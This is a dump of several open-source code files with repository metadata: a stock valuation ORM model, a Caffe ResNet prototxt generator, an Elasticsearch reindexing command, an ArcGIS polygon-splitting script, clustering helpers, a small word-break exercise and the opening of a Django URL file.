2cb02c7acfe67e6e6cc10232c459c4e7541db8cc | 4,637 | py | Python | omicron/models/valuation.py | evimacs/omicron | abe77fd25a93cf3d0d17661ae957373474724535 | [
"MIT"
] | 4 | 2020-11-09T02:23:51.000Z | 2021-01-24T00:45:21.000Z | omicron/models/valuation.py | evimacs/omicron | abe77fd25a93cf3d0d17661ae957373474724535 | [
"MIT"
] | 14 | 2020-11-09T02:31:34.000Z | 2021-12-22T10:15:47.000Z | omicron/models/valuation.py | evimacs/omicron | abe77fd25a93cf3d0d17661ae957373474724535 | [
"MIT"
] | 2 | 2021-01-24T00:45:25.000Z | 2021-12-24T06:18:37.000Z | import datetime
from typing import List, Union
import numpy as np
from sqlalchemy.dialects.postgresql import insert
from sqlalchemy.types import Date, Float, Integer, Numeric, String
import omicron
from omicron import db
from omicron.client.quotes_fetcher import get_valuation
class Valuation(db.Model):
    """Daily per-security valuation metrics stored in the ``valuation`` table."""
    __tablename__ = "valuation"

    id = db.Column(Integer, primary_key=True)
    code = db.Column(String, nullable=False)
    pe = db.Column(Float)
    turnover = db.Column(Float)
    pb = db.Column(Float)
    ps = db.Column(Float)
    pcf = db.Column(Float)
    capital = db.Column(Numeric)
    market_cap = db.Column(Numeric)
    circulating_cap = db.Column(Numeric)
    circulating_market_cap = db.Column(Numeric)
    pe_lyr = db.Column(Float)
    frame = db.Column(Date, nullable=False)
    # numpy dtype per column, used by to_numpy() to build structured arrays.
    types = {
        "code": "O",
        "pe": "f4",
        "turnover": "f4",
        "pb": "f4",
        "ps": "f4",
        "pcf": "f4",
        "capital": "f4",
        "market_cap": "f4",
        "circulating_cap": "f4",
        "circulating_market_cap": "f4",
        "pe_lyr": "f4",
        "frame": "O",
    }
    @classmethod
    async def get(
        cls,
        codes: Union[List[str], str],
        frame: datetime.date,
        fields: List[str] = None,
        n: int = 1,
    ) -> np.array:
        """Fetch the `n` valuation records per security ending at `frame`.

        Although multiple securities and multiple dates can be queried at
        once, callers are advised to query either many securities for one
        day, or one security for many days, to keep post-processing simple.

        The caller must ensure that `n` records exist up to `frame` for
        each security; otherwise every call performs a wasted database
        query (the condition below cannot be satisfied) and falls through
        to the upstream server, which likely returns data already stored
        locally.

        Regardless of the query shape, the result is a numpy structured
        array with code and date acting as the index, records sorted by
        date ascending; the ordering between securities is whatever the
        upstream server returns.

        Args:
            codes (Union[List[str], str]): security code(s) to query.
            frame (datetime.date): last (inclusive) date of the window.
            fields (List[str]): if None, then returns all columns/fields from
            database/remote
            n (int): number of records per security.

        Returns:
            np.array: numpy structured array with the fields:
                "code", "pe","turnover","pb","ps","pcf","capital","market_cap",
                "circulating_cap","circulating_market_cap","pe_lyr", "date"
        """
        if omicron.has_db():
            fields = fields or [
                "code",
                "pe",
                "turnover",
                "pb",
                "ps",
                "pcf",
                "capital",
                "market_cap",
                "circulating_cap",
                "circulating_market_cap",
                "pe_lyr",
                "frame",
            ]
            if isinstance(codes, str):
                codes = [codes]
            # Selecting explicit fields (even all of them) avoids building
            # full Valuation ORM objects.
            query = (
                cls.select(*fields).where(cls.code.in_(codes)).where(cls.frame <= frame)
            )
            query = query.order_by(cls.frame.desc()).limit(len(codes) * n)
            records = await query.gino.all()
            if records and len(records) == n * len(codes) and records[0].frame == frame:
                return cls.to_numpy(records, fields)[::-1]
        # if no db connection, or no result from database, then try remote fetch
        return await get_valuation(codes, frame, fields, n)
    @classmethod
    def to_numpy(cls, records: List, fields: List[str]) -> np.array:
        """Convert database query results into a numpy structured array.

        Args:
            records (List): rows returned by the gino query.
            fields (List[str]): column names, in output order.

        Returns:
            np.array: structured array typed per ``cls.types``.
        """
        dtypes = [(name, cls.types[name]) for name in fields]
        return np.array(
            [tuple(rec[name] for name in fields) for rec in records], dtype=dtypes
        )
    @classmethod
    async def save(cls, recs: np.array):
        # Upsert: on (code, frame) conflict, overwrite every field present
        # in the incoming records.
        data = [dict(zip(recs.dtype.names, x)) for x in recs]
        qs = insert(cls.__table__).values(data)
        return await (
            qs.on_conflict_do_update(
                index_elements=[cls.code, cls.frame],
                set_={col: qs.excluded[col] for col in recs.dtype.names},
            )
            .returning(cls.id)
            .gino.all()
        )
    @classmethod
    async def get_circulating_cap(cls, code: str, frame: datetime.date, n: int):
        """Convenience wrapper: fetch only (frame, circulating_cap) columns."""
        fields = ["frame", "circulating_cap"]
        return await cls.get(code, frame, fields, n)
    @classmethod
    async def truncate(cls):
        """truncate table in database."""
        # db.bind: `https://python-gino.org/docs/en/master/explanation/engine.html`
        await db.bind.status(f"truncate table {cls.__tablename__}")
| 31.331081 | 88 | 0.563727 | 5,015 | 0.946762 | 0 | 0 | 4,146 | 0.782707 | 3,574 | 0.674722 | 2,317 | 0.437417 |
2cb12c4d4584cf6f238a2a2f0fe96c07ce3365fd | 8,064 | py | Python | examples/resnet-v1/resnet_v1.py | statisticszhang/Image-classification-caffe-model | 33084ca0841e768dae84db582e15bb29ffeeaaec | [
"MIT"
] | 1 | 2020-06-03T12:53:43.000Z | 2020-06-03T12:53:43.000Z | examples/resnet-v1/resnet_v1.py | statisticszhang/Image-classification-caffe-model | 33084ca0841e768dae84db582e15bb29ffeeaaec | [
"MIT"
] | null | null | null | examples/resnet-v1/resnet_v1.py | statisticszhang/Image-classification-caffe-model | 33084ca0841e768dae84db582e15bb29ffeeaaec | [
"MIT"
] | null | null | null | import caffe
from caffe import layers as L
from caffe import params as P
def conv_bn_scale_relu(bottom, num_output=64, kernel_size=3, stride=1, pad=0):
    """Convolution followed by in-place BatchNorm, Scale and ReLU.

    Returns the (conv, bn, scale, relu) layer tuple; all post-conv layers
    operate in place on the convolution blob.
    """
    lr_params = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)]
    conv = L.Convolution(
        bottom,
        num_output=num_output,
        kernel_size=kernel_size,
        stride=stride,
        pad=pad,
        param=lr_params,
        weight_filler=dict(type='xavier', std=0.01),
        bias_filler=dict(type='constant', value=0),
    )
    bn = L.BatchNorm(conv, use_global_stats=False, in_place=True)
    scale = L.Scale(conv, scale_param=dict(bias_term=True), in_place=True)
    relu = L.ReLU(conv, in_place=True)
    return conv, bn, scale, relu
def conv_bn_scale(bottom, num_output=64, kernel_size=3, stride=1, pad=0):
    """Convolution followed by in-place BatchNorm and Scale (no activation).

    Used for the last conv of a bottleneck and for projection shortcuts,
    where the ReLU is applied only after the element-wise sum.
    """
    lr_params = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)]
    conv = L.Convolution(
        bottom,
        num_output=num_output,
        kernel_size=kernel_size,
        stride=stride,
        pad=pad,
        param=lr_params,
        weight_filler=dict(type='xavier', std=0.01),
        bias_filler=dict(type='constant', value=0.2),
    )
    bn = L.BatchNorm(conv, use_global_stats=False, in_place=True)
    scale = L.Scale(conv, scale_param=dict(bias_term=True), in_place=True)
    return conv, bn, scale
def eltwize_relu(bottom1, bottom2):
    """Element-wise SUM of two blobs followed by an in-place ReLU."""
    # operation=1 selects SUM in caffe's Eltwise layer.
    fused = L.Eltwise(bottom1, bottom2, eltwise_param=dict(operation=1))
    activated = L.ReLU(fused, in_place=True)
    return fused, activated
def residual_branch(bottom, base_output=64):
    """Bottleneck residual block with an identity shortcut.

    input:  4*base_output x n x n
    output: 4*base_output x n x n

    :param bottom: input layer (must already carry 4*base_output channels)
    :param base_output: base num_output of branch2
    :return: every layer of the branch plus the eltwise join and its ReLU
    """
    # Classic bottleneck: 1x1 reduce -> 3x3 -> 1x1 expand.
    b2a, b2a_bn, b2a_scale, b2a_relu = conv_bn_scale_relu(
        bottom, num_output=base_output, kernel_size=1)
    b2b, b2b_bn, b2b_scale, b2b_relu = conv_bn_scale_relu(
        b2a, num_output=base_output, kernel_size=3, pad=1)
    b2c, b2c_bn, b2c_scale = conv_bn_scale(
        b2b, num_output=4 * base_output, kernel_size=1)
    residual, residual_relu = eltwize_relu(bottom, b2c)  # identity shortcut
    return (b2a, b2a_bn, b2a_scale, b2a_relu,
            b2b, b2b_bn, b2b_scale, b2b_relu,
            b2c, b2c_bn, b2c_scale,
            residual, residual_relu)
def residual_branch_shortcut(bottom, stride=2, base_output=64):
    """Bottleneck residual block with a 1x1 projection shortcut.

    Used as the first block of each stage: branch1 projects the input to
    4*base_output channels (optionally downsampling via `stride`) so it can
    be summed with the bottleneck branch2.

    :param bottom: input layer
    :param stride: spatial stride applied by branch1 and branch2a
    :param base_output: base num_output of branch2
    :return: every layer of both branches plus the eltwise join and its ReLU
    """
    b1, b1_bn, b1_scale = conv_bn_scale(
        bottom, num_output=4 * base_output, kernel_size=1, stride=stride)
    b2a, b2a_bn, b2a_scale, b2a_relu = conv_bn_scale_relu(
        bottom, num_output=base_output, kernel_size=1, stride=stride)
    b2b, b2b_bn, b2b_scale, b2b_relu = conv_bn_scale_relu(
        b2a, num_output=base_output, kernel_size=3, pad=1)
    b2c, b2c_bn, b2c_scale = conv_bn_scale(
        b2b, num_output=4 * base_output, kernel_size=1)
    residual, residual_relu = eltwize_relu(b1, b2c)  # 4*base_output x n x n
    return (b1, b1_bn, b1_scale,
            b2a, b2a_bn, b2a_scale, b2a_relu,
            b2b, b2b_bn, b2b_scale, b2b_relu,
            b2c, b2c_bn, b2c_scale,
            residual, residual_relu)
branch_shortcut_string = 'n.res(stage)a_branch1, n.res(stage)a_branch1_bn, n.res(stage)a_branch1_scale, \
n.res(stage)a_branch2a, n.res(stage)a_branch2a_bn, n.res(stage)a_branch2a_scale, n.res(stage)a_branch2a_relu, \
n.res(stage)a_branch2b, n.res(stage)a_branch2b_bn, n.res(stage)a_branch2b_scale, n.res(stage)a_branch2b_relu, \
n.res(stage)a_branch2c, n.res(stage)a_branch2c_bn, n.res(stage)a_branch2c_scale, n.res(stage)a, n.res(stage)a_relu = \
residual_branch_shortcut((bottom), stride=(stride), base_output=(num))'
branch_string = 'n.res(stage)b(order)_branch2a, n.res(stage)b(order)_branch2a_bn, n.res(stage)b(order)_branch2a_scale, \
n.res(stage)b(order)_branch2a_relu, n.res(stage)b(order)_branch2b, n.res(stage)b(order)_branch2b_bn, \
n.res(stage)b(order)_branch2b_scale, n.res(stage)b(order)_branch2b_relu, n.res(stage)b(order)_branch2c, \
n.res(stage)b(order)_branch2c_bn, n.res(stage)b(order)_branch2c_scale, n.res(stage)b(order), n.res(stage)b(order)_relu = \
residual_branch((bottom), base_output=(num))'
class ResNet(object):
    """Builds ResNet v1 train/test prototxt via caffe NetSpec.

    NOTE: this file is Python 2 (`xrange`, statement-form `exec`); keep it so.
    """
    def __init__(self, lmdb_train, lmdb_test, num_output):
        self.train_data = lmdb_train
        self.test_data = lmdb_test
        self.classifier_num = num_output
    def resnet_layers_proto(self, batch_size, phase='TRAIN', stages=(3, 4, 6, 3)):
        """
        :param batch_size: the batch_size of train and test phase
        :param phase: TRAIN or TEST
        :param stages: the num of layers = 2 + 3*sum(stages), layers would better be chosen from [50, 101, 152]
                       {every stage is composed of 1 residual_branch_shortcut module and stage[i]-1 residual_branch
                       modules, each module consists of 3 conv layers}
                        (3, 4, 6, 3) for 50 layers; (3, 4, 23, 3) for 101 layers; (3, 8, 36, 3) for 152 layers
        """
        n = caffe.NetSpec()
        if phase == 'TRAIN':
            source_data = self.train_data
            mirror = True
        else:
            source_data = self.test_data
            mirror = False
        n.data, n.label = L.Data(source=source_data, backend=P.Data.LMDB, batch_size=batch_size, ntop=2,
                                 transform_param=dict(crop_size=224, mean_value=[104, 117, 123], mirror=mirror))
        n.conv1, n.conv1_bn, n.conv1_scale, n.conv1_relu = \
            conv_bn_scale_relu(n.data, num_output=64, kernel_size=7, stride=2, pad=3)  # 64x112x112
        n.pool1 = L.Pooling(n.conv1, kernel_size=3, stride=2, pool=P.Pooling.MAX)  # 64x56x56
        # Each stage: one projection block (i == 0) followed by identity
        # blocks.  The exec templates splice the generated layer names into
        # the NetSpec `n`; see branch_shortcut_string / branch_string above.
        for num in xrange(len(stages)):  # num = 0, 1, 2, 3
            for i in xrange(stages[num]):
                if i == 0:
                    stage_string = branch_shortcut_string
                    # Bottom of the first block of each stage is the last
                    # block of the previous stage (or pool1 for stage 2).
                    bottom_string = ['n.pool1', 'n.res2b%s' % str(stages[0] - 1), 'n.res3b%s' % str(stages[1] - 1),
                                     'n.res4b%s' % str(stages[2] - 1)][num]
                else:
                    stage_string = branch_string
                    if i == 1:
                        bottom_string = 'n.res%sa' % str(num + 2)
                    else:
                        bottom_string = 'n.res%sb%s' % (str(num + 2), str(i - 1))
                exec (stage_string.replace('(stage)', str(num + 2)).replace('(bottom)', bottom_string).
                      replace('(num)', str(2 ** num * 64)).replace('(order)', str(i)).
                      replace('(stride)', str(int(num > 0) + 1)))
        # Global average pooling over the final stage's last residual block.
        exec 'n.pool5 = L.Pooling((bottom), pool=P.Pooling.AVE, global_pooling=True)'.\
            replace('(bottom)', 'n.res5b%s' % str(stages[3] - 1))
        n.classifier = L.InnerProduct(n.pool5, num_output=self.classifier_num,
                                      param=[dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],
                                      weight_filler=dict(type='xavier'),
                                      bias_filler=dict(type='constant', value=0))
        n.loss = L.SoftmaxWithLoss(n.classifier, n.label)
        if phase == 'TRAIN':
            pass
        else:
            # Accuracy layers are only attached in the TEST net.
            n.accuracy_top1 = L.Accuracy(n.classifier, n.label, include=dict(phase=1))
            n.accuracy_top5 = L.Accuracy(n.classifier, n.label, include=dict(phase=1),
                                         accuracy_param=dict(top_k=5))
        return n.to_proto()
| 51.363057 | 130 | 0.637773 | 3,297 | 0.408854 | 0 | 0 | 0 | 0 | 0 | 0 | 2,325 | 0.288318 |
2cb169a96cf55ed5e83fe9eb7891602b251f5fd7 | 3,145 | py | Python | app/commands/elastic.py | viert/knowledgehub | 295a66002f26d694e518af97ad80269d69d59adf | [
"MIT"
] | 8 | 2020-06-16T07:45:35.000Z | 2020-08-10T10:11:50.000Z | app/commands/elastic.py | viert/knowledgehub | 295a66002f26d694e518af97ad80269d69d59adf | [
"MIT"
] | 2 | 2021-10-06T18:31:08.000Z | 2022-02-19T03:32:29.000Z | app/commands/elastic.py | viert/knowledgehub | 295a66002f26d694e518af97ad80269d69d59adf | [
"MIT"
] | null | null | null | from datetime import datetime
from glasskit.commands import Command
from glasskit import ctx
from ask.models.post import BasePost
from ask import force_init_app
# Elasticsearch index definition for posts: Russian-language analysis on
# title/body, case-insensitive exact-match tags via the "lower" normalizer.
POST_INDEX_SETTINGS = {
    "settings": {
        "analysis": {
            "normalizer": {
                "lower": {
                    "type": "custom",
                    "char_filter": [],
                    "filter": ["lowercase"]
                }
            }
        }
    },
    "mappings": {
        "properties": {
            "title": {
                "type": "text",
                "analyzer": "russian",
            },
            "body": {
                "type": "text",
                "analyzer": "russian",
            },
            "tags": {
                "type": "keyword",
                "normalizer": "lower",
            },
            "type": {
                "type": "text",
            }
        }
    }
}
class Elastic(Command):
    """CLI command that (re)builds the Elasticsearch index of posts."""
    def init_argument_parser(self, parser):
        # Usage: elastic index [--all [--drop]].  Note --drop only takes
        # effect together with --all (see reindex()).
        subparsers = parser.add_subparsers(
            help="action to perform with index",
            dest="action"
        )
        idx = subparsers.add_parser("index", help="index documents")
        idx.add_argument("--all", "-a", action="store_true", default=False,
                         help="re-index from scratch")
        idx.add_argument("--drop", "-d", action="store_true", default=False,
                         help="drop existing index before re-indexing")
    @staticmethod
    def drop():
        """Delete the "posts" index, ignoring bad-request/not-found errors."""
        t1 = datetime.now()
        ctx.es.indices.delete(index="posts", ignore=[400, 404])
        t2 = datetime.now()
        dt = (t2 - t1).total_seconds()
        ctx.log.info("Index dropped in %.3f seconds", dt)
    @staticmethod
    def prepare():
        """Create the "posts" index with the settings defined above."""
        t1 = datetime.now()
        ctx.es.indices.create(index="posts", body=POST_INDEX_SETTINGS)
        t2 = datetime.now()
        dt = (t2 - t1).total_seconds()
        ctx.log.info("Index set up in %.3f seconds", dt)
    def reindex(self):
        """Index every post that produces an indexer document.

        Only full reindexing (--all) is implemented; --drop additionally
        deletes the index before re-creating it.
        """
        if self.args.all:
            if self.args.drop:
                self.drop()
            self.prepare()
            t1 = datetime.now()
            updated = 0
            created = 0
            for post in BasePost.find():
                doc = post.get_indexer_document()
                if doc is None:
                    continue  # post opted out of indexing
                resp = ctx.es.index(index="posts", id=post._id, body=doc)
                if resp["result"] == "created":
                    created += 1
                elif resp["result"] == "updated":
                    updated += 1
            t2 = datetime.now()
            dt = (t2 - t1).total_seconds()
            ctx.log.info("Posts full reindexing completed. Created %d, updated %d documents in %.3f seconds",
                         created, updated, dt)
        else:
            raise NotImplementedError("partial reindex is not implemented")
    def run(self):
        """Command entry point: validate the ES connection, then dispatch."""
        force_init_app()
        if ctx.es is None:
            ctx.log.error("elasticsearch is not configured properly, giving up")
            return
        if self.args.action == 'index':
            self.reindex()
| 29.669811 | 109 | 0.480445 | 2,232 | 0.709698 | 0 | 0 | 501 | 0.1593 | 0 | 0 | 707 | 0.224801 |
2cb4d9e9fa72ff7492cc09a76f5ecff9cc15231c | 6,350 | py | Python | PolygonLineTools/Scripts/split_by_area.py | Dan-Patterson/Tools_for_ArcGIS_Pro | b5c253d59d57bd1abe7e2433a77aed7d3ea22567 | [
"Info-ZIP"
] | 23 | 2020-05-15T18:40:25.000Z | 2022-03-31T08:44:39.000Z | PolygonLineTools/Scripts/split_by_area.py | Dan-Patterson/Tools_for_ArcGIS_Pro | b5c253d59d57bd1abe7e2433a77aed7d3ea22567 | [
"Info-ZIP"
] | 1 | 2021-12-14T16:47:00.000Z | 2021-12-15T03:06:26.000Z | PolygonLineTools/Scripts/split_by_area.py | Dan-Patterson/Tools_for_ArcGIS_Pro | b5c253d59d57bd1abe7e2433a77aed7d3ea22567 | [
"Info-ZIP"
] | 3 | 2021-08-09T05:42:19.000Z | 2022-03-31T08:44:59.000Z | # -*- coding: UTF-8 -*-
"""
split_by_area
===========
Script : split_by_area.py
Author : Dan_Patterson@carleton.ca
Modified: 2018-08-27
Purpose : tools for working with numpy arrays
Notes:
-----
The xs and ys form pairs with the first and last points being identical
The pairs are constructed using n-1 to ensure that you don't form a
line from identical points.
First split polygon is a sample of a multipart. Added 0, 0 and 0, 80
back in
>>> xs = [0., 0., 80., 0, 0., 100., 100., 0.]
>>> ys = [0., 30., 30., 80., 100., 100., 0., 0.]
>>> a = np.array(list(zip(xs, ys))) * 1.0 # --- must be floats
>>> v = np.array([[50., 0], [50, 100.]])
>>> ext = np.array([[0., 0], [0, 100.],[100, 100.], [100., 0.], [0., 0.]])
return a, v
References:
----------
`<https://stackoverflow.com/questions/3252194/numpy-and-line-intersections>`_.
`<https://community.esri.com/message/627051?commentID=627051#comment-627051>`
`<https://community.esri.com/message/779043-re-how-to-divide-irregular-
polygon-into-equal-areas-using-arcgis-105?commentID=779043#comment-779043>`
This is a good one
`<https://tereshenkov.wordpress.com/2017/09/10/dividing-a-polygon-into-a-given
-number-of-equal-areas-with-arcpy/>`
---------------------------------------------------------------------
"""
# ---- imports, formats, constants ----
import sys
import math
from textwrap import dedent
import numpy as np
import warnings
from arcpytools_plt import (tweet, fc_info, _poly_ext,
trans_rot, cal_area, get_polys)
import arcpy
warnings.simplefilter('ignore', FutureWarning)
ft = {'bool': lambda x: repr(x.astype(np.int32)),
'float_kind': '{: 0.3f}'.format}
np.set_printoptions(edgeitems=5, linewidth=80, precision=2, suppress=True,
threshold=100, formatter=ft)
np.ma.masked_print_option.set_display('-') # change to a single -
script = sys.argv[0] # print this should you need to locate the script
# ---- Do the work or run the demo ------------------------------------------
#
frmt = """
Input features.... {}
Output features... {}
Number of splits . {}
Split types ...... {}
"""
def _cut_poly(poly, p_id, step=1.0, split_axis="X", split_fac=4, SR=None):
    """Cut a polygon into strips along one axis.

    Parameters
    ----------
    poly : arcpy.Polygon
        Polygon to subdivide.
    p_id : number
        Identifier of the polygon, used only for error reporting.
    step : number
        Spacing between successive cut lines.
    split_axis : text
        "X" cuts with vertical lines, "Y" with horizontal lines.
    split_fac : number
        Number of equal areas requested (not used here; callers apply it).
    SR : arcpy.SpatialReference
        Spatial reference for the generated cutting polylines.

    Returns
    -------
    cuts, cutters : pieces of the polygon and the polylines used to cut it.
    """
    L, B, R, T = _poly_ext(poly)
    dx = step
    dy = step
    if split_axis == "X":
        lefts = np.arange(L+dx, R+dx, dx, dtype='float')
        splitters = np.array([[[l, B-1.0], [l, T+1.0]] for l in lefts])
    elif split_axis == "Y":
        # Bug fix: this branch previously tested the module-level global
        # `s_axis`, silently ignoring the `split_axis` parameter.
        tops = np.arange(B+dy, T+dy, dy, dtype='float')
        splitters = np.array([[[R+1.0, t], [L-1.0, t]] for t in tops])
    else:
        # Previously fell through with `splitters` undefined (NameError).
        raise ValueError("split_axis must be 'X' or 'Y', got {!r}".format(split_axis))
    cutters = []
    for s in splitters:
        s = s.tolist()
        c = arcpy.Polyline(arcpy.Array([arcpy.Point(*xy) for xy in s]), SR)
        cutters.append(c)
    # ---- successively slice pieces off `poly` with each cutter
    cuts = []
    for cutter in cutters:
        rght = poly
        if cutter.crosses(poly):
            try:
                left, rght = poly.cut(cutter)
                if rght is None:
                    cuts.append(left)
                # NOTE(review): `left` is appended twice when rght is None
                # (same pattern as final_cut) - confirm intended.
                cuts.append(left)
                poly = rght
                rght = left
            except RuntimeError:
                tweet("Issues with poly...{}".format(p_id))
                continue
        else:
            cuts.append(rght)
    return cuts, cutters
def final_cut(cutters, poly):
    """Apply a pre-selected list of cutters to `poly` and return the pieces.

    Mirrors the cutting loop in `_cut_poly`, but runs only the cutters
    chosen (by `cal_area`) to approximate the equal-area targets.
    """
    cuts = []
    for cutter in cutters:
        rght = poly
        if cutter.crosses(poly):
            try:
                left, rght = poly.cut(cutter)
                if rght is None:
                    cuts.append(left)
                cuts.append(left)
                poly = rght
                rght = left
            except RuntimeError:
                # Bug fix: the old message formatted `p_id`, a name that is
                # not defined in this function (it only worked via a
                # module-global leak); report without it.
                tweet("Issues cutting polygon")
                continue
        else:
            cuts.append(rght)
    return cuts  # , cutters
# ---- demo and tool section -------------------------------------------------
#
if len(sys.argv) == 1:
testing = False
in_pth = script.split("/")[:-2] + ["Polygon_lineTools.gdb"]
in_fc = "/".join(in_pth) + "/shapes_mtm9"
out_fc = "/".join(in_pth) + "/c0"
s_axis = "Y"
s_fac = 4
else:
testing = False
in_fc = sys.argv[1]
out_fc = sys.argv[2]
s_fac = int(sys.argv[3])
s_axis = sys.argv[4]
# ---- for both
#
shp_fld, oid_fld, shp_type, SR = fc_info(in_fc)
out_polys, out_ids = get_polys(in_fc)
#old_ids = np.repeat(out_ids, s_fac) # produce data for the output id field
# ---- instant bail
if SR.type == 'Projected':
result_ = []
for i in range(len(out_polys)):
poly = out_polys[i]
p_id = out_ids[i]
cuts, cutters = _cut_poly(poly, p_id, step=1,
split_axis = s_axis,
split_fac=4, SR=SR)
idxs = cal_area(poly, cuts, cutters, s_fac)
f_cutters = [cutters[i] for i in idxs]
r = final_cut(f_cutters, poly)
result_.extend(r)
if not testing:
if arcpy.Exists(out_fc):
arcpy.Delete_management(out_fc)
arcpy.CopyFeatures_management(result_, out_fc)
out_ids = np.repeat(out_ids, s_fac)
id_fld = np.zeros((len(result_),),
dtype=[("key", "<i4"), ("Old_ID", "<i4")])
id_fld["key"] = np.arange(1, len(result_) + 1)
id_fld["Old_ID"] = out_ids
arcpy.da.ExtendTable(out_fc, oid_fld, id_fld, "key")
else:
msg = """
-----------------------------------------------------------------
Input data is not in a projected coordinate system....
bailing...
-----------------------------------------------------------------
"""
tweet(msg)
# ----------------------------------------------------------------------
# __main__ .... code section
if __name__ == "__main__":
"""Optionally...
: - print the script source name.
: - run the _demo
"""
| 31.435644 | 79 | 0.517008 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,826 | 0.445039 |
2cb66c34c6dad5e2ecafad8d080c45ac92930ec1 | 2,081 | py | Python | clustering/utils.py | IhabBendidi/IIC-SimCLR-MoCo-clusterer | be04de5051aba1b181279eb759907ab21f480fcd | [
"Apache-2.0"
] | 12 | 2021-11-09T15:24:10.000Z | 2022-02-13T19:05:51.000Z | clustering/utils.py | IhabBendidi/IIC-SimCLR-MoCo-clusterer | be04de5051aba1b181279eb759907ab21f480fcd | [
"Apache-2.0"
] | null | null | null | clustering/utils.py | IhabBendidi/IIC-SimCLR-MoCo-clusterer | be04de5051aba1b181279eb759907ab21f480fcd | [
"Apache-2.0"
] | null | null | null | from scipy import linalg
from sklearn.decomposition import PCA
from scipy.optimize import linear_sum_assignment as linear_assignment
import numpy as np
"""
A function that takes a list of clusters and a list of centroids (one per cluster), and outputs, for each cluster, a boolean mask marking the N members closest to that cluster's centroid.
"""
def closest_to_centroid(clusters, centroids, nb_closest=20):
    """For each cluster, flag the `nb_closest` members nearest its centroid.

    Parameters
    ----------
    clusters : list of per-cluster member features (lists, arrays, or torch
        tensors; CUDA tensors are moved to the CPU first).
    centroids : list of centroid vectors, one per cluster.
    nb_closest : how many members to keep per cluster.

    Returns
    -------
    List of boolean masks, one per cluster, aligned with each cluster's
    original member order; True marks one of the nb_closest members.
    """
    output = [[] for _ in range(len(centroids))]
    for i in range(len(centroids)):
        centroid = centroids[i]
        cluster = clusters[i]
        try:
            # Move any CUDA tensors to the CPU before list conversion.
            cluster_tmp = [x.cpu() if x.is_cuda else x for x in cluster]
        except AttributeError:  # members are plain arrays/lists, not tensors
            cluster_tmp = cluster
        cluster = [list(x) for x in cluster_tmp]
        if len(cluster) > nb_closest:
            # Reduce dimensionality before measuring distances on clusters
            # large enough to need trimming (PCA is only built when used).
            nb_components = 7 if len(cluster) > 10 else len(cluster) - 1
            pca = PCA(n_components=nb_components)
            cluster = pca.fit_transform(cluster)
            centroid = pca.transform(centroid.reshape(1, -1))
        distances = [linalg.norm(x - centroid) for x in cluster]
        # Bug fix: keep an unsorted COPY before sorting.  The old code
        # aliased the list (`duplicate_distances = distances`), so the
        # in-place sort reordered both and the mask no longer corresponded
        # to the cluster's original member order.
        original_order = distances[:]
        distances.sort()
        if len(distances) >= nb_closest:
            distances = distances[:nb_closest]
        output[i] = [x in distances for x in original_order]
    return output
def cluster_acc(y_true, y_pred):
    """
    Calculate clustering accuracy under the best one-to-one label matching.
    Require scikit-learn/scipy installed.
    # Arguments
        y: true labels, numpy.array with shape `(n_samples,)`
        y_pred: predicted labels, numpy.array with shape `(n_samples,)`
    # Return
        accuracy, in [0,1]
    """
    y_true = y_true.astype(np.int64)
    assert y_pred.size == y_true.size
    # Contingency table: w[p, t] = number of samples predicted p with truth t.
    # np.add.at replaces the old Python-level per-sample loop.
    D = max(y_pred.max(), y_true.max()) + 1
    w = np.zeros((D, D), dtype=np.int64)
    np.add.at(w, (y_pred, y_true), 1)
    # Hungarian assignment on the negated table picks the label mapping that
    # maximizes the number of agreeing samples.
    row_ind, col_ind = linear_assignment(w.max() - w)
    return w[row_ind, col_ind].sum() * 1.0 / y_pred.size
| 35.87931 | 153 | 0.640077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 458 | 0.220086 |
2cb740471359d11f904828cc498bfc6b7c07a43b | 1,247 | py | Python | Prep/bbphone.py | armsky/Algorithms | 04fe858f001d7418f8e0eab454b779fe1e863483 | [
"Apache-2.0"
] | null | null | null | Prep/bbphone.py | armsky/Algorithms | 04fe858f001d7418f8e0eab454b779fe1e863483 | [
"Apache-2.0"
] | null | null | null | Prep/bbphone.py | armsky/Algorithms | 04fe858f001d7418f8e0eab454b779fe1e863483 | [
"Apache-2.0"
] | 2 | 2019-06-27T09:05:07.000Z | 2019-07-01T04:41:53.000Z | // This is the text editor interface.
// Anything you type or change here will be seen by the other person in real time.
import java.util.*;
public class HelloWorld {
public static boolean isSentence(String s, HashSet<String> d) {
return false;
}
public static void main(String[] args) {
// Prints "Hello, World" to the terminal window.
HashSet<String> dictionary=new HashSet<String> ();
dictionary.add("I");
dictionary.add("LOVE");
dictionary.add("TO");
dictionary.add("EAT");
dictionary.add("TACOS");
dictionary.add("MEET");
dictionary.add("ME");
dictionary.add("THERE");
String s="ILOVETOEATTACOS";
//String s="MEETMETHERE";
System.out.println(isSentence(s,dictionary));
}
}
def isSentence(s, d):
    """Return True if `s` can be segmented into words from dictionary `d`.

    Classic word-break: try every prefix that is a dictionary word and
    recurse on the remainder.  The empty string is trivially a sentence.
    """
    if not s:
        return True
    if s in d:
        return True
    for i in range(1, len(s) + 1):
        # Short-circuit as soon as one valid segmentation is found; the old
        # `mark` flag kept exhaustively exploring every remaining split.
        if s[0:i] in d and isSentence(s[i:], d):
            return True
    return False
s = "AILOVE"
print isSentence(s,d)
s = "ILOVE"
print isSentence(s,d)
s = "ILOVEA"
print isSentence(s,d)
s="ILOVETOEATTACOS"
print isSentence(s,d)
s="MEETMETHERE"
print isSentence(s,d)
| 22.267857 | 82 | 0.597434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 139 | 0.111468 |
2cb9006dc93f30229a35a9a95092c8065ef3469e | 860 | py | Python | phantastes/urls.py | santeyio/phantastesproject | 5ce1e2cb59e8283fe280e01d0e185be62cd4001a | [
"MIT"
] | null | null | null | phantastes/urls.py | santeyio/phantastesproject | 5ce1e2cb59e8283fe280e01d0e185be62cd4001a | [
"MIT"
] | null | null | null | phantastes/urls.py | santeyio/phantastesproject | 5ce1e2cb59e8283fe280e01d0e185be62cd4001a | [
"MIT"
] | null | null | null | from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from phantastes import views
from django.contrib import admin
# URL routing table (legacy Django `patterns()` style): home page, Spirit
# forum, admin, account/profile apps, polls, readings, about page and chat.
urlpatterns = patterns(
    "",
    url(r"^$", views.index, name="home"),
